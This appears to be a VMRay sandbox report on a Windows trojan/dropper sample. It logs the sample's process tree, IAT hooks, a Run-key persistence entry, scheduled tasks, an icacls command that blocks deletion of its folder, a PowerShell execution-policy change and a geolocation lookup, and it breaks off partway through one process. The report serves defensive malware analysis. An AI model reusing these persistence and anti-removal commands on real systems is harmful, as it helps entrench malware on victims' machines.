7713cce5...c671 | Grouped Behavior
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Downloader, Dropper, Trojan

EB54.tmp.exe

Windows Exe (x86-32)

Created at 2019-05-13T17:21:00

...

Remarks (2/2)

(0x2000004): The operating system was rebooted during the analysis because the sample installed a startup script, task or application for persistence.

(0x200003a): 2 tasks were rescheduled ahead of time to reveal dormant functionality.

Grouped Sequential

Monitored Processes

Process Graph

Process Graph Legend
Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xa78 Analysis Target High (Elevated) eb54.tmp.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe" -
#3 0x888 Child Process High (Elevated) icacls.exe icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee" /deny *S-1-1-0:(OI)(CI)(DE,DC) #1
#4 0x50c Created Scheduled Job High (Elevated) taskeng.exe taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1] #1
#5 0x2c8 Child Process High (Elevated) eb54.tmp.exe "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe" --Admin IsNotAutoStart IsNotTask #1
#6 0x8f0 Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe" #5
#7 0x570 Child Process High (Elevated) updatewin2.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin2.exe" #5
#8 0x6d0 Child Process High (Elevated) updatewin1.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin1.exe" --Admin #6
#9 0x4a4 Child Process High (Elevated) updatewin.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\updatewin.exe" #5
#10 0x874 Child Process High (Elevated) 5.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\b5a25ed0-1316-46f7-8916-da3c9e0e5de0\5.exe" #5
#11 0x86c Child Process High (Elevated) powershell.exe powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned #8
#12 0x838 Created Scheduled Job Medium taskeng.exe taskeng.exe {A9833FF7-6F72-4DC6-BD4D-B3A90059795D} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1] #5
#13 0x818 Child Process Medium eb54.tmp.exe "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --Task #12

Behavior Information - Grouped by Category

Process #1: eb54.tmp.exe
677 2
»
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:44, Reason: Analysis Target
Unmonitor End Time: 00:01:33, Reason: Self Terminated
Monitor Duration 00:00:49
OS Process Information
»
Information Value
PID 0xa78
Parent PID 0x45c (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A7C
0x ABC
0x AC4
0x ACC
0x AD0
0x AD4
0x AD8
0x AFC
0x BFC
0x 880
0x 594
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
eb54.tmp.exe 0x00400000 0x004D0FFF Relevant Image - 32-bit - False False
...
eb54.tmp.exe 0x00400000 0x004D0FFF Process Termination - 32-bit - True False
...
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000002a0000:+0x554dd 2. entry of eb54.tmp.exe 4 bytes kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x9c22b0c
...
IAT private_0x00000000002a0000:+0x554dd 3. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateThread+0x0 now points to private_0x000000007fff0000:+0x433cf85d
...
IAT private_0x00000000002a0000:+0x554dd 4. entry of eb54.tmp.exe 4 bytes kernel32.dll:WritePrivateProfileStructW+0x0 now points to private_0x000000007fff0000:+0x9115d8b
...
IAT private_0x00000000002a0000:+0x554dd 5. entry of eb54.tmp.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x610184d
...
IAT private_0x00000000002a0000:+0x554dd 7. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0xbf97d8b
...
IAT private_0x00000000002a0000:+0x554dd 8. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x79040c45
...
IAT private_0x00000000002a0000:+0x554dd 13. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0xbf975ff
...
IAT private_0x00000000002a0000:+0x554dd 18. entry of eb54.tmp.exe 4 bytes kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0xb8074f3
...
IAT private_0x00000000002a0000:+0x554dd 19. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x78841446
...
IAT private_0x00000000002a0000:+0x554dd 20. entry of eb54.tmp.exe 4 bytes kernel32.dll:lstrcpyA+0x0 now points to private_0x000000007fff0000:+0xb087208
...
IAT private_0x00000000002a0000:+0x554dd 25. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x568c02eb
...
IAT private_0x00000000002a0000:+0x554dd 26. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetDriveTypeW+0x0 now points to private_0x000000007fff0000:+0x5fd458b
...
IAT private_0x00000000002a0000:+0x554dd 27. entry of eb54.tmp.exe 4 bytes kernel32.dll:DuplicateHandle+0x0 now points to private_0x000000007fff0000:+0xb2274c0
...
IAT private_0x00000000002a0000:+0x554dd 28. entry of eb54.tmp.exe 4 bytes kernel32.dll:GlobalMemoryStatus+0x0 now points to private_0x000000007fff0000:+0x4004085d
...
IAT private_0x00000000002a0000:+0x554dd 33. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x3a7be850
...
IAT private_0x00000000002a0000:+0x554dd 40. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0x4e8c02eb
...
IAT private_0x00000000002a0000:+0x554dd 41. entry of eb54.tmp.exe 4 bytes kernel32.dll:FlushFileBuffers+0x0 now points to private_0x000000007fff0000:+0x519458b
...
IAT private_0x00000000002a0000:+0x554dd 42. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x69850fc0
...
IAT private_0x00000000002a0000:+0x554dd 47. entry of eb54.tmp.exe 4 bytes kernel32.dll:RtlUnwind+0x0 now points to private_0x000000007fff0000:+0x7a83e850
...
IAT private_0x00000000002a0000:+0x554dd 48. entry of eb54.tmp.exe 4 bytes kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x44840001
...
IAT private_0x00000000002a0000:+0x554dd 49. entry of eb54.tmp.exe 4 bytes kernel32.dll:TlsGetValue+0x0 now points to pagefile_0x00000000009f0000:+0x12fe90c
...
IAT private_0x00000000002a0000:+0x554dd 54. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetCurrentThreadId+0x0 now points to private_0x000000007fff0000:+0x6b0f8b04
...
IAT private_0x00000000002a0000:+0x554dd 55. entry of eb54.tmp.exe 4 bytes kernel32.dll:InterlockedDecrement+0x0 now points to private_0x000000007fff0000:+0x3cf8b02
...
IAT private_0x00000000002a0000:+0x554dd 64. entry of eb54.tmp.exe 4 bytes kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x6b178b04
...
IAT private_0x00000000002a0000:+0x554dd 65. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetTickCount+0x0 now points to private_0x000000007fff0000:+0x3d78b02
...
IAT private_0x00000000002a0000:+0x554dd 69. entry of eb54.tmp.exe 4 bytes kernel32.dll:GetACP+0x0 now points to private_0x000000007fff0000:+0x7c76ff0c
...
IAT private_0x00000000002a0000:+0x554dd 72. entry of eb54.tmp.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x69420c8d
...
IAT private_0x00000000002a0000:+0x554dd 75. entry of eb54.tmp.exe 4 bytes kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x315468b
...
IAT private_0x00000000002a0000:+0x554dd 78. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x7884d68b
...
IAT private_0x00000000002a0000:+0x554dd 79. entry of eb54.tmp.exe 4 bytes kernel32.dll:VirtualAlloc+0x0 now points to private_0x000000007fff0000:+0xb057208
...
IAT private_0x00000000002a0000:+0x554dd 80. entry of eb54.tmp.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0xb03eb0e
...
IAT private_0x00000000002a0000:+0x554dd 84. entry of eb54.tmp.exe 4 bytes user32.dll:EndPaint+0x0 now points to private_0x000000007fff0000:+0xd20048d
...
IAT private_0x00000000002a0000:+0x554dd 86. entry of eb54.tmp.exe 4 bytes user32.dll:EnumDisplaySettingsA+0x0 now points to private_0x000000007fff0000:+0xc00ff72
...
IAT private_0x00000000002a0000:+0x554dd 87. entry of eb54.tmp.exe 4 bytes user32.dll:DrawTextExW+0x0 now points to private_0x000000007fff0000:+0x44841446
...
IAT private_0x00000000002a0000:+0x554dd 90. entry of eb54.tmp.exe 4 bytes user32.dll:SetPropA+0x0 now points to private_0x000000007fff0000:+0x568c02eb
...
IAT private_0x00000000002a0000:+0x554dd 92. entry of eb54.tmp.exe 4 bytes user32.dll:LoadImageA+0x0 now points to private_0x000000007fff0000:+0xb0f8b0e
...
IAT private_0x00000000002a0000:+0x554dd 93. entry of eb54.tmp.exe 4 bytes user32.dll:DestroyCursor+0x0 now points to private_0x000000007fff0000:+0xd541445
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe 442.50 KB MD5: 241f592a445513811b3bc3f104ffb2a8
SHA1: 578c0a16e2428764c928db50738db2d843ca6c2f
SHA256: 7713cce5768ed6d8250d01a006e26b5cfab3ff296f8c6dd8684a5142cc54c671
SSDeep: 6144:3z2W1PSKq67m+2xgx08t3tmrFLLgjIv5+dHgSnSppJlV3/jKGKYoezUtyB:/u6sxgK8t9mrFL0jougpJL3/jKGxN9 		False
...
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\geo[1].json 465 bytes MD5: d6727470681ecc2ca56bbd0486b4fa97
SHA1: 693756ab251ef2d82a91d94a2e5b78a9604d8bac
SHA256: 8b37ae3083eb3bb497d0de9aa0f48e4fa2b893726e2a9787e6dad0ecd40d9613
SSDeep: 12:YCJcjmdVQVCRbwXhCdEVQVPB8yPt0fRbIRAJdxFQVyrhmXoB2SH4:YODQVCRbwxCCQVvV0fRbI2JdxFQVyNm5 		False
...
Host Behavior
COM (8)
»
Operation Class Interface Additional Information Success Count Logfile
Create TaskScheduler ITaskService cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Execute TaskScheduler ITaskService method_name = Connect, server_name = 95, domain = 95, password = 4289035 True 1
Fn
Execute TaskScheduler ITaskService method_name = GetFolder, path = \, new_interface = ITaskFolder True 1
Fn
Execute TaskScheduler ITaskService method_name = NewTask, new_interface = ITaskDefinition True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Triggers, new_interface = ITriggerCollection True 1
Fn
Execute TaskScheduler ITriggerCollection method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger True 1
Fn
Execute TaskScheduler IDailyTrigger method_name = put_StartBoundary, start_boundary = 2019-05-14T03:23:19 True 1
Fn
Execute TaskScheduler ITaskDefinition method_name = get_Actions, new_interface = IActionCollection True 1
Fn
File (507)
»
Operation Filename Additional Information Success Count Logfile
Create Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee - True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Open - - False 498
Fn
Copy C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe True 1
Fn
Delete C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe - False 1
Fn
Registry (4)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run - True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = 0, type = REG_NONE False 1
Fn
Write Value HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee\EB54.tmp.exe" --AutoStart, size = 214, type = REG_EXPAND_SZ True 1
Fn
Process (49)
»
Operation Process Additional Information Success Count Logfile
Create icacls os_pid = 0x888, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe show_window = SW_SHOW True 1
Fn
Enumerate Processes - - True 1
Fn
Open System desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\smss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\wininit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\csrss.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\winlogon.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\services.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsass.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\lsm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\audiodg.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\dwm.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\explorer.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\spoolsv.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\taskeng.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\taskhost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\program files (x86)\adobe\jefferson balanced qualifications.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\uninstall information\zero.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\msbuild\partial.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\general_renewable_visual.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft visual studio 8\hayes-arlington-photography.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft sql server compact edition\acc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\reference assemblies\battery.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\jeffrey indiana.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\windows sidebar\vendor carey nicholas.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\fetish_cd_education.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\internet explorer\hostel.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\microsoft office\engine.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\dvd maker\learners_textbooks.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\microsoft office\gratuitjuryreasonable.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\mozilla maintenance service\pursuit.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\uninstall information\zincshniagara.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files\msbuild\losses.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\program files (x86)\msbuild\technologies_signatures_notebooks.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION True 1
Fn
Open c:\windows\system32\wbem\wmiprvse.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\sppsvc.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Open c:\windows\system32\svchost.exe desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION False 1
Fn
Module (78)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 3
Fn
Load Psapi.dll base_address = 0x75140000 True 1
Fn
Load Shell32.dll base_address = 0x75fd0000 True 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 12
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 260 True 2
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe, size = 1024 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 8
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadStackGuarantee, address_out = 0x76c3d31f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalProcessorInformation, address_out = 0x76cb4761 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDefaultDllDirectories, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumSystemLocalesEx, address_out = 0x76cb424f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetDateFormatEx, address_out = 0x76cc6676 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeFormatEx, address_out = 0x76cc65f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetUserDefaultLocaleName, address_out = 0x76cb47c1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidLocaleName, address_out = 0x76cb47e1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleExW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandleW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcesses, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnumProcessModules, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleBaseNameW, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcesses, address_out = 0x75141544 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = EnumProcessModules, address_out = 0x75141408 True 1
Fn
Get Address c:\windows\syswow64\psapi.dll function = GetModuleBaseNameW, address_out = 0x7514152c True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
System (7)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-05-13 17:22:16 (UTC) True 1
Fn
Get Time type = Ticks, time = 116267 True 1
Fn
Get Time type = Performance Ctr, time = 16712249458 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:22:21 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 17284874121 True 1
Fn
Get Time type = System Time, time = 2019-05-13 17:22:49 (UTC) True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Network Behavior
HTTP Sessions (1)
»
Information Value
Total Data Sent 467 bytes
Total Data Received 7.12 KB
Contacted Host Count 1
Contacted Hosts 77.123.139.189
HTTP Session #1
»
Information Value
Server Name api.2ip.ua
Server Port 443
Username -
Password -
Data Sent 467 bytes
Data Received 7.12 KB
Operation Additional Information Success Count Logfile
Open Session user_agent = Microsoft Internet Explorer, access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = https, server_name = api.2ip.ua, server_port = 443 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP 1.1, target_resource = /geo.json True 1
Fn
Send HTTP Request headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = https://api.2ip.ua/geo.json True 1
Fn
Read Response size = 10240, size_out = 465 True 1
Fn
Data
Close Session - True 1
Fn
Process #3: icacls.exe
0 0
»
Information Value
ID #3
File Name c:\windows\syswow64\icacls.exe
Command Line icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\e7a330f2-5311-4ef8-8fe9-e63e989b94ee" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:28, Reason: Child Process
Unmonitor End Time: 00:01:29, Reason: Self Terminated
Monitor Duration 00:00:01
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x888
Parent PID 0xa78 (c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 580
0x 90
Process #4: taskeng.exe
0 0
»
Information Value
ID #4
File Name c:\windows\system32\taskeng.exe
Command Line taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:01:30, Reason: Created Scheduled Job
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:14
Remark No high level activity detected in monitored regions
OS Process Information
»
Information Value
PID 0x50c
Parent PID 0x36c (Unknown)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 984
0x 578
0x 574
0x 520
0x 514
0x 510
0x 840
Process #5: eb54.tmp.exe
1114 13
»
Information Value
ID #5
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\eb54.tmp.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\EB54.tmp.exe" --Admin IsNotAutoStart IsNotTask
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:32, Reason: Child Process
Unmonitor End Time: 00:04:44, Reason: Terminated by Timeout
Monitor Duration 00:03:12
